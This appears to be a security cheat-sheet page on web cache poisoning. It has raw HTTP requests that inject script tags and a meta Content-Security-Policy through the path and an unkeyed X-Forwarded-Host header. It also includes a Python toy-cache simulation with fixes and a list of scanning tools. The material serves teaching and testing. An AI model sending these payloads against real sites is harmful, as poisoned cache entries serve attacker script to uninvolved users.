# Web Cache Poisoning

### General

{% hint style="info" %}
Web cache poisoning is an advanced technique whereby an attacker exploits the behavior of a web server and cache so that a harmful HTTP response is served to other users.

Fundamentally, web cache poisoning involves two phases. First, the attacker must work out how to elicit a response from the back-end server that inadvertently contains some kind of dangerous payload. Once successful, they need to make sure that their response is cached and subsequently served to the intended victims.

A poisoned web cache can potentially be a devastating means of distributing numerous different attacks, exploiting vulnerabilities such as XSS, JavaScript injection, open redirection, and so on.
{% endhint %}

## Web Cache Poisoning <a href="#web-cache-poisoning" id="web-cache-poisoning"></a>

### Reflected XSS with Cache Poisoning <a href="#reflected-xss-with-cache-poisoning" id="reflected-xss-with-cache-poisoning"></a>

If the website reflects the requested path into the response, for example in its 404 page:

```
https://example.com/xyz

# Output in the 404 page
Page not found: /xyz
```

We can try to inject an XSS payload through the path:

```
https://example.com/xyz<script>alert(1)</script>
```

A browser URL-encodes characters such as `<` and `>` before sending the request, so visiting this URL normally sends `/xyz%3Cscript%3Ealert(1)%3C/script%3E` and the payload is reflected encoded and harmless. **Burp Repeater** sends the path exactly as typed, so the origin reflects the raw `<script>` tag and that response gets cached. If the cache normalizes its key (the encoded and unencoded paths map to the same entry), a victim who opens the URL from their browser is served the poisoned entry: the reflected XSS fires despite the browser's URL encoding. Confirm the entry really came from the cache (for example an `X-Cache: hit` or a non-zero `Age` header on a repeat request), and add a cache-buster parameter while probing so you do not poison entries that real users are receiving.

### Meta Tag XSS <a href="#meta-tag-xss" id="meta-tag-xss"></a>

The `X-Forwarded-Host` header is usually unkeyed (not part of the cache key), yet some applications use it to build absolute URLs, here an Open Graph `og:image` tag. First confirm the reflection with a harmless value:

```
GET /?id=1 HTTP/1.1
Host: victim.com
X-Forwarded-Host: evil.com
...

<!-- Response -->
HTTP/1.1 200 OK
Cache-Control: public, no-cache
...
<meta property="og:image" content="https://evil.com/example.jpg" />
```

#### Exploit <a href="#exploit" id="exploit"></a>

```
GET /?id=2 HTTP/1.1
Host: victim.com
X-Forwarded-Host: evil.com"><script>alert(1)</script>
...

<!-- Response -->
HTTP/1.1 200 OK
Cache-Control: public, no-cache
...
<meta property="og:image" content="https://evil.com"><script>alert(1)</script>" />
```

### Meta Tag CSP Overriding <a href="#meta-tag-csp-overriding" id="meta-tag-csp-overriding"></a>

If the website sets its **CSP (Content-Security-Policy)** with a `meta` tag instead of a response header, the same injection point can be used to add a `meta` CSP of our own to the cached page. Caveat: a second policy does not replace the first. A `meta` CSP only governs content parsed after it, and when several policies are in effect a resource must satisfy all of them, so an injected policy never loosens restrictions that are already active. It matters when the injection point comes before the site's own `meta` CSP: an inline payload placed directly after the injected tag is then evaluated against the injected `'unsafe-inline'` policy alone.

```
GET /?id=2 HTTP/1.1
Host: victim.com
X-Forwarded-Host: victim.com"><meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'unsafe-inline'">
...

<!-- Response -->
HTTP/1.1 200 OK
Cache-Control: public, no-cache
...
<meta property="og:image" content="https://victim.com"><meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'unsafe-inline'">
```
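
The following is an added example, not code from the original page: a toy shared cache in front of an origin that reflects the raw request path in its 404 page (the URL-normalization case from the Reflected XSS section) and reflects the unkeyed `X-Forwarded-Host` header into an `og:image` tag (the Meta Tag sections). It walks through both phases of the attack, the check a tester would run, and the two fixes: keying the cache on the header (`Vary`) and escaping at the origin. The names `origin_app`, `hardened_app`, `ToyCache`, the hosts and the payloads are illustrative assumptions, not a real deployment.

```python
# Added example (not from the original page). All names, hosts and payloads are
# illustrative assumptions; the cache logic models a CDN that stores "public"
# responses under a percent-decoded (Host, path+query) key.
from html import escape
from urllib.parse import unquote, urlsplit

Response = tuple[int, dict, str]  # (status, headers, body)


def origin_app(path_query: str, headers: dict) -> Response:
    """Vulnerable origin: reflects the path and X-Forwarded-Host without escaping."""
    url = urlsplit(path_query)
    host = headers.get("X-Forwarded-Host", headers["Host"])  # attacker-controlled, unkeyed
    resp_headers = {"Cache-Control": "public, max-age=30"}
    if url.path == "/":
        body = f'<head><meta property="og:image" content="https://{host}/example.jpg" /></head>'
        return 200, resp_headers, body
    return 404, resp_headers, f"Page not found: {url.path}"  # raw path reflected


def hardened_app(path_query: str, headers: dict) -> Response:
    """Fixed origin: ignores X-Forwarded-Host and HTML-escapes anything it reflects."""
    url = urlsplit(path_query)
    host = escape(headers["Host"], quote=True)  # Host is part of the cache key
    resp_headers = {"Cache-Control": "public, max-age=30"}
    if url.path == "/":
        body = f'<head><meta property="og:image" content="https://{host}/example.jpg" /></head>'
        return 200, resp_headers, body
    return 404, resp_headers, f"Page not found: {escape(url.path, quote=True)}"


class ToyCache:
    """Stores 'public' responses keyed on (Host, path+query[, varied headers]).
    normalize_key=True percent-decodes the key, so '/a<b' and '/a%3Cb' share one entry."""

    def __init__(self, app, normalize_key: bool = True, vary: tuple = ()):
        self.app, self.normalize_key, self.vary, self.store = app, normalize_key, vary, {}

    def key(self, path_query: str, headers: dict) -> tuple:
        pq = unquote(path_query) if self.normalize_key else path_query
        return (headers["Host"], pq) + tuple(headers.get(h, "") for h in self.vary)

    def get(self, path_query: str, headers: dict) -> Response:
        k = self.key(path_query, headers)
        if k in self.store:
            status, h, body = self.store[k]
            return status, {**h, "X-Cache": "hit"}, body
        status, h, body = self.app(path_query, headers)
        if "public" in h.get("Cache-Control", ""):
            self.store[k] = (status, h, body)
        return status, {**h, "X-Cache": "miss"}, body


RAW_PATH = "/xyz<script>alert(1)</script>"               # what Burp Repeater sends
BROWSER_PATH = "/xyz%3Cscript%3Ealert(1)%3C/script%3E"  # what a browser sends for that URL
XFH_PAYLOAD = 'evil.com"><script>alert(1)</script>'      # constructed header payload


def poison_via_path(cache: ToyCache) -> Response:
    """Phase 1: attacker elicits the reflected payload with the raw path; it gets cached.
    Phase 2: the victim's browser requests the encoded form and receives the entry."""
    cache.get(RAW_PATH, {"Host": "example.com"})
    return cache.get(BROWSER_PATH, {"Host": "example.com"})


def poison_via_xfh(cache: ToyCache) -> Response:
    """Same two phases via the unkeyed header; the victim sends no X-Forwarded-Host."""
    cache.get("/?id=2", {"Host": "victim.com", "X-Forwarded-Host": XFH_PAYLOAD})
    return cache.get("/?id=2", {"Host": "victim.com"})


def served_poisoned(resp: Response) -> bool:
    """Tester's check: served from cache AND still carries the unescaped script tag."""
    status, headers, body = resp
    return headers.get("X-Cache") == "hit" and "<script>alert(1)</script>" in body


if __name__ == "__main__":
    print(served_poisoned(poison_via_path(ToyCache(origin_app))))                          # True
    print(served_poisoned(poison_via_path(ToyCache(origin_app, normalize_key=False))))     # False
    print(served_poisoned(poison_via_xfh(ToyCache(origin_app))))                           # True
    print(served_poisoned(poison_via_xfh(ToyCache(origin_app, vary=("X-Forwarded-Host",)))))  # False
    print(served_poisoned(poison_via_xfh(ToyCache(hardened_app))))                         # False
```

The first two lines of output show why the Burp Repeater trick works only when the cache key is normalized: with `normalize_key=False` the victim's encoded path is a cache miss and the origin reflects it harmlessly encoded. The `vary` option models adding the header to the cache key, which stops the poisoned entry from reaching a victim who never sent it, but the durable fix is the origin change in `hardened_app`: build URLs from `Host` only and escape everything reflected.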

### References <a href="#references" id="references"></a>

* [PortSwigger](https://portswigger.net/web-security/web-cache-poisoning)
* [OWASP](https://owasp.org/www-community/attacks/Cache_Poisoning)
* [0xn3va](https://0xn3va.gitbook.io/cheat-sheets/web-application/web-cache-poisoning)

### Tools

```bash
# https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner
wcvs -u https://url.com
# https://github.com/s0md3v/Arjun
python3 arjun.py -u https://url.com --get 
python3 arjun.py -u https://url.com --post
# https://github.com/maK-/parameth
python parameth.py -u https://example.com/test.php
# https://github.com/devanshbatham/ParamSpider
python3 paramspider.py --domain example.com
# https://github.com/s0md3v/Parth
python3 parth.py -t example.com
```

The same unkeyed-header attack in general form: this request poisons the cached copy of `/en?region=uk`, so every user who later requests that URL receives the reflected payload.

```
GET /en?region=uk HTTP/1.1
Host: innocent-website.com
X-Forwarded-Host: a."><script>alert(1)</script>"
```
